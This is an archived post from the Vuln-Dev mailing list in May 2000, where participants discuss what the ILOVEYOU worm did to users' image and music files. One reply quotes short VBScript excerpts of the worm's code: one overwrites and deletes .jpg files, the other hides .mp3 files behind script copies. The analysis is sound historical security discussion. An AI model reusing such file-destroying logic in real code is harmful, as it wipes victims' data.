Vulnerability Development mailing list archives

Re: I love you Author evidence ?

From: sachsm () JTFCND IA MIL (Sachs, Marcus)
Date: Wed, 10 May 2000 08:46:16 -0400


If the script executed properly, the .jpg's were replaced by a copy of the
script and the originals deleted:

elseif(ext="jpg") or (ext="jpeg") then
      set ap=fso.OpenTextFile(f1.path,2,true)
      ap.write vbscopy
      ap.close
      set cop=fso.GetFile(f1.path)
      cop.copy(f1.path&".vbs")
      fso.DeleteFile(f1.path)

Only the .mp2's and .mp3's were hidden (attribute "2"):

elseif(ext="mp3") or (ext="mp2") then
      set mp3=fso.CreateTextFile(f1.path&".vbs")
      mp3.write vbscopy
      mp3.close
      set att=fso.GetFile(f1.path)
      att.attributes=att.attributes+2

ms

-----Original Message-----
From: Harmer, Mike [mailto:MHarmer () MVG COM]
Sent: Tuesday, May 09, 2000 2:29 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: I love you Author evidence ?

This is not true. It replaces the .jpg files with itself, some times. There
is some kind of bug at work, but it does not hide them.

Michael E. Harmer
Miller-Valentine Group
4000 Miller-Valentine Ct.
Dayton, OH 45439-1487
x804
mharmer () mvg com

----------------------------------------------
In the middle of difficulty lies opportunity.
--Albert Einstein
----------------------------------------------

-----Original Message-----
From: White Vampire [mailto:whitevampire () MINDLESS COM]
Sent: Monday, May 08, 2000 1:26 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: I love you Author evidence ?

On Sun, May 07, 2000 at 10:16:26PM -0500, Christofer C.
Bell(cbell () JAYHAWKS NET) wrote:
: I just wanted to point out that not all the losses are in terms of
: shutdown email.  I know of several of that had their business' webservers
: impacted because Windows clients had the machines mounted via SMB
: filesharing (the web development group specifically) and the "worm"
: deleted the site's .jpg files.

        From what I read somewhere, the .JPG (et cetera) files are only
marked 'hidden' and are easily recoverable.

: This is just some additional insight on how the figure of $100M may have
: been reached.

        I find this and most alleged 'damage figures' to be extreme.

Regards,

--
    __      ______   ____
   /  \    /  \   \ /   / White Vampire\Rem
   \   \/\/   /\   Y   /  http://www.projectgamma.com/
    \        /  \     /   http://www.webfringe.com/
     \__/\  /    \___/    http://www.gammaforce.org/
          \/ "Silly hacker, root is for administrators."

Current thread:

Re: I love you Author evidence ?, (continued)
- - - Re: I love you Author evidence ? Trevor Schroeder (May 07)
    - Re: I love you Author evidence ? Lynn Baier (May 07)
    - Windows NT 4.0 and Sendmail 3.0.1 for NT Brian DuRoss (May 08)
    - Re: I love you Author evidence ? White Vampire (May 08)
    - If virii are so dangerous, why is the internet still runing? Christopher Dinsmore (May 07)
  - Re: I love you Author evidence ? Joe (May 07)
    - Re: I love you Author evidence ? Blue Boar (May 07)
- Re: I love you Author evidence ? Sachs, Marcus (May 08)
- Re: I love you Author evidence ? Harmer, Mike (May 09)
  - Re: I love you Author evidence ? White Vampire (May 09)
- Re: I love you Author evidence ? Sachs, Marcus (May 10)